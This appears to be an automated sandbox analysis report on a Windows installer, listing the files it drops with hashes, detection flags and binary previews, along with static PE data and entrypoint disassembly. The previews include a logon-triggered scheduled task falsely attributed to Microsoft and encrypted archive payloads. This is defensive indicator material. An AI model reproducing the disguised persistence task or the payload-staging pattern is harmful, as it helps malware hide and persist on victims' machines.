                            C:\Program Files (x86)\Windows NT\locale7.bin

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653607
                            Encrypted:true
                            SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                            MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                            SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                            SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                            SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                            Malicious:false
                            Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.

                            C:\Program Files (x86)\Windows NT\locale7.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):29730
                            Entropy (8bit):7.994290657653608
                            Encrypted:true
                            SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                            MD5:A9C8A3E00692F79E1BA9693003F85D18
                            SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                            SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                            SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                            Malicious:false
                            Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8

                            C:\Program Files (x86)\Windows NT\res.dat

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:7-zip archive data, version 0.4
                            Category:dropped
                            Size (bytes):2631665
                            Entropy (8bit):7.999930027122199
                            Encrypted:true
                            SSDEEP:49152:a9KRaF4B6lZYPv5jRwQNLpPKYlB8a+/OO1i/ncoQhnXTNZvCOy0k:EKR6C6jCv5jJppBppOacoQFX5Vyh
                            MD5:5959826018FEF5FC2FC4045B36EE00CE
                            SHA1:94BF8814C8333EE72DC5E9B1883AB7302109F38C
                            SHA-256:93FFE7A9D2F233B1820BBED0ED87DB977A0AC5D068544B68A38895559B4B1B80
                            SHA-512:0CD5594B32F0B34D55A171B38CE15855E1E145AC12E04D15A9902028F6D7A7A61209DD6523A429274B0B78DEB0600F1738A5B63BCFD2482423832A6A3D18C719
                            Malicious:false
                            Preview:7z..'....;z..'(.....A.......6o^.>"|L.......=O|%d.S...55.^..{m...........[....j.s.i..S.....l.D."../f].dN.L........k.O.O..x'...,...<.As...=0....E...p. \..k.F......krK.).l...V.2.@1.h...p.PG.6.SK.m..j....#.d...k.tTs..Q...k.o.....Y1.??Q.@T..=:...tP$.j...o....N-jTojGu.....z..p..........K+iV....4..D..#..L...R.=5.oBV#.....d.`9..8>..+.2H.....+.........-..*O^.aW/.X.G.U.8.Y.L\.q.K.s.RZ..>...2.....+.Aa..1..1...`q.dti..G...y...>..O..B...F....Ih..'.e.1.....0.\..K...B.SD.v...B.v=..V.[.:.lY.`..y.E....Su....8..*..{...&d.n.....c9.cd.Zx..L,.".Gi.....9s.|Br.......{..Hj.6.O:..e:..h...wQ..<.6.G......T.)f0.....bX..5......D.@4..?.@.........1Zn....b....oc.>.5...I..SA..n.x.A...p....E.`.-Q..l(.4...._.......^..E.R e\.u..O-@\..o.h.`.$.]..(.~w.d.X[...d&...'mw..Z....BY.L......ND.h."7.`>......j.37.~..<Mn,..;.1..h.g..>..H1U.......*2..5..(\j...."...t.8.soy.<..[.......g...^~!5f..*0.?..)......P..mkQ.y..LXn...r....>..6v3ND.X........q..|=...y..i.Z..n....J.....i.'....e...LZ

                            C:\Program Files (x86)\Windows NT\tProtect.dll

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):63640
                            Entropy (8bit):6.482810107683822
                            Encrypted:false
                            SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                            MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                            SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                            SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                            SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 9%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................

                            C:\Program Files (x86)\Windows NT\task.xml

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:data
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):3.3449406240731085
                            Encrypted:false
                            SSDEEP:48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
                            MD5:1EA10B1FA76DC2F1967E53A3FC2D43C4
                            SHA1:23EADA9D0994D5B9ADE7878493C44551C0B5CF44
                            SHA-256:2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
                            SHA-512:15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
                            Malicious:false
                            Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv

                            C:\Program Files (x86)\Windows NT\trash

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):2381502
                            Entropy (8bit):7.999925361527667
                            Encrypted:true
                            SSDEEP:49152:jy256EiA8xG5zSjVi8PdH5lP0fc2k5UASQ/oFY/vyJHDNruHBsOvW:jyIrB8xG58fH5lP0l6XUNrWC
                            MD5:688183445140DA0F13690A143C57A42F
                            SHA1:01DF7279FA87C87733E93BF7B3DA05CF2ECF6490
                            SHA-256:8F0464EC2A7320ED2B11972E642AA490423857277E2BEB87B8C4DBDDA467894A
                            SHA-512:2C01BC07A0FED5FA6516DFDE36B2574620D1DC03D20B5814B467E38519EAC0EE82D403A94BD6D2966ED8713E9ABE26A1A00925805B1793ECD23621BA85045FD7
                            Malicious:false
                            Preview:..8-....,....A...TU.>.t.....~.N.Y4,..cZX"O]Z..n.G.;..3.,.WIz..<H....,.H,.w./.%"&z...z...;.&...<Jp..............z@....)...+..........-.|..c.._?S.mYY..j.|O..u..).........oR.%...3ZZX.%....}....2o.U..-.(D(w..f..f........AA....og....y...I..=..8.7..ld&dG.xC_.......f...$.....I..^..t..#=.k.L.....8...q&.....!X......a.XA.q.b|m.5.Gh0...J..R....../&*d....-.o..v.Z...;t!..Tb%.?.u.t.-.G....j.m.].m...=u.....o ..B.....e.^VO]j...%..[..`._...M.<.lq..%.-...BQ.C..oK:r4...dO...N...{O..E87M.a..Hwoxaw.J.T).s.C......w..P...9.qj.=cr..{.R...:Uf#,....M..h?.[.k...........K./.!....E(..G_.$.....1.1.T.......7......a........E.b...q...F.0...i.w.../..%/.&.9.?;...6X.!>...{.}]...K..]..2w..G;....XP!..ddwH....|......8.......O..J.-N....=.......g1p........z.w.3.P...........f......(uY..]......34._.5.'3.g.6p.E.4..`Z..EZ...p..b.&.........g...K.#Vd....\..,...D."+.M..#.#...&.|.[...7...#...$..o.*.U.@uF.u.c...u....'..52..u.Ni.>.jl.W..e.......^......` ..<..'.cRf.z$..H../&.Qb3z.1.

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):64
                            Entropy (8bit):1.1940658735648508
                            Encrypted:false
                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                            Malicious:false
                            Preview:@...e................................................@..........

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btyrupx5.y2i.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_du20kmzg.gxt.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iwncgwux.kwc.ps1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ss5zr4bs.jen.psm1

                            Download File
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:ASCII text, with no line terminators
                            Category:dropped
                            Size (bytes):60
                            Entropy (8bit):4.038920595031593
                            Encrypted:false
                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                            Malicious:false
                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                            C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\_isetup\_setup64.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-2F3JC.tmp\update.vac

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606016
                            Entropy (8bit):7.0063494494702985
                            Encrypted:false
                            SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                            MD5:95ACD5631A9131DB1FD066565AFC9A67
                            SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                            SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                            SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp

                            Download File
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530562565512027
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:E4680C0AB69900E6A19A0AA38BD54AAD
                            SHA1:F4350D5430FDB90C16C55B71DCBC4B42297EC475
                            SHA-256:D2E14BDEE1B2F82C3AE57D9619D1D7B71DD9AAFAA86128AC64F695867704A0E0
                            SHA-512:9AB2A1A31084355B4C19FB6E9233A6674E442754FBDCCF2E93C5F6EAB6936CA7F0ADEEC15DE164FBB8F019994DB0A1F34859BAAB941DFA1804306C3EFBA949C9
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                            C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp

                            Download File
                            Process:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe
                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3366912
                            Entropy (8bit):6.530562565512027
                            Encrypted:false
                            SSDEEP:98304:nJYVM+LtVt3P/KuG2ONG9iqLRQE9333T:2VL/tnHGYiql5F
                            MD5:E4680C0AB69900E6A19A0AA38BD54AAD
                            SHA1:F4350D5430FDB90C16C55B71DCBC4B42297EC475
                            SHA-256:D2E14BDEE1B2F82C3AE57D9619D1D7B71DD9AAFAA86128AC64F695867704A0E0
                            SHA-512:9AB2A1A31084355B4C19FB6E9233A6674E442754FBDCCF2E93C5F6EAB6936CA7F0ADEEC15DE164FBB8F019994DB0A1F34859BAAB941DFA1804306C3EFBA949C9
                            Malicious:true
                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.....f..................*...........*.......*...@..........................04...........@......@...................P,.n.....,.j:...P0.......................,.<............................p,.......................,......@,.(....................text.....*.......*................. ..`.itext..$.....*..0....*............. ..`.data.........*.......*.............@....bss.....|....+..........................idata..j:....,..<...f+.............@....didata.(....@,.......+.............@....edata..n....P,.......+.............@..@.tls....X....`,..........................rdata..]....p,.......+.............@..@.reloc..<.....,.......+.............@..B.rsrc........P0......./.............@..@.............04......`3.............@..@................

                            C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\_isetup\_setup64.tmp

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:PE32+ executable (console) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):6144
                            Entropy (8bit):4.720366600008286
                            Encrypted:false
                            SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                            MD5:E4211D6D009757C078A9FAC7FF4F03D4
                            SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                            SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                            SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                            Malicious:false
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 0%
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\is-SVJRT.tmp\update.vac

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):3606016
                            Entropy (8bit):7.0063494494702985
                            Encrypted:false
                            SSDEEP:49152:/MifTj964EMRY42Kgq7eJEJqx2dhZe71MzuiehWIKxZfAtbyBSfbZmSKiyQF:/M+jcZ42KXw2dhZe71MzSRFyBSDH
                            MD5:95ACD5631A9131DB1FD066565AFC9A67
                            SHA1:8E9473BD632FF0F57FC34EECAC17174341D80D94
                            SHA-256:EA6B71519CD54AB523B822F84D5D4E5B305214DA4C37E96A02D8BC1CB182F58B
                            SHA-512:70188E7AD6B0D9DA5E88EEFC6095F99066F73FDAB10F084E3F2F96B30D8A717BAE75E9C1B476FB996BC86B9A753AAF26F96024D0068090B437EACE6E5BE35681
                            Malicious:true
                            Antivirus:
                            • Antivirus: ReversingLabs, Detection: 24%
                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....Fig...........!.....h....................................................7...........@.........................XC.......J..<....07.X....................@7..?...................................................K...............................text....f.......h.................. ..`.rdata..T............l..............@..@.data................b..............@....00cfg.......`(......"(.............@..@.tls.........p(......$(.............@....voltbl.F.....(......&(..................#.q....P.....(......((............. ..`.rsrc...X....07.......6.............@..@.reloc...?...@7..@....6.............@..B................................................................................................................................................................................................................................................................................

                            \Device\ConDrv

                            Download File
                            Process:C:\Program Files (x86)\Windows NT\7zr.exe
                            File Type:ASCII text, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):406
                            Entropy (8bit):5.117520345541057
                            Encrypted:false
                            SSDEEP:6:AMpUMcvtFHcAxXF2SaioBGWOSTIPAiTVHsCgN/J2+ebVcdsvUGrFfpap1tNSK6n:pCXVZRwXkWDThGHs/JldsvhJA1tNS9n
                            MD5:9200058492BCA8F9D88B4877F842C148
                            SHA1:EED69748A26CFAF769EF589F395A162E87005B36
                            SHA-256:BAFB8C87BCB80E77FF659D7B8152145866D8BD67D202624515721CBF38BA8745
                            SHA-512:312AB0CBA3151B3CE424198C0855EEE39CC06FC8271E3D49134F00D7E09407964F31D3107169479CE4F8FD85D20BBD3F5309D3052849021954CD46A0B723F2A9
                            Malicious:false
                            Preview:..7-Zip (a) 23.01 (x86) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20....Scanning the drive for archives:.. 0M Scan. .1 file, 31890 bytes (32 KiB)....Extracting archive: locale3.dat..--..Path = locale3.dat..Type = 7z..Physical Size = 31890..Headers Size = 354..Method = LZMA2:16 LZMA:16 BCJ2 7zAES..Solid = -..Blocks = 1.... 0%. .Everything is Ok....Size: 63640..Compressed: 31890..

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.959675428593499
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 98.04%
                            • Inno Setup installer (109748/4) 1.08%
                            • InstallShield setup (43055/19) 0.42%
                            • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                            File name:#U5b89#U88c5#U52a9#U624b2.0.7.exe
                            File size:8'648'945 bytes
                            MD5:d4c8420bea7c19a44ab6ad71fd8dde34
                            SHA1:32357f3fbd634ec73d11a2322e317b6c2d50e1b4
                            SHA256:25147cff7a4bd1554ca3d0fa3549982132be1c59f75881786e5457ff3128ff6a
                            SHA512:ce69f77af9cddde5dacfeeed2b8ee3d9cc99180e7dd7b3d51dcf9ecbfd2135692e84fedd216b2de0549b64246b972122da6309b77f6c9bf5c218caab95e6a7ba
                            SSDEEP:196608:l3USsuLZLqp/zr+RVj6f4AL05yAMdZd8pr90Rerw:l3nLK7KRl6fdLVVZdc9y
                            TLSH:1E962322F2CBE03EF05D1B370573A14854FB6A616922AE179AECB4ECCE355501E3E647
                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                            File Icon

                            Icon Hash:0c0c2d33ceec80aa

                            Static PE Info

                            General

                            Entrypoint:0x4a83bc
                            Entrypoint Section:.itext
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:40ab50289f7ef5fae60801f88d4541fc

                            Entrypoint Preview

                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004A2EBCh
                            call 00007F00A8EAEE65h
                            xor eax, eax
                            push ebp
                            push 004A8AC1h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004A8A7Bh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004B0634h]
                            call 00007F00A8F407EBh
                            call 00007F00A8F4033Eh
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007F00A8F3B018h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004B41F4h
                            call 00007F00A8EA8F13h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004B41F4h]
                            mov dl, 01h
                            mov eax, dword ptr [0049CD14h]
                            call 00007F00A8F3C343h
                            mov dword ptr [004B41F8h], eax
                            xor edx, edx
                            push ebp
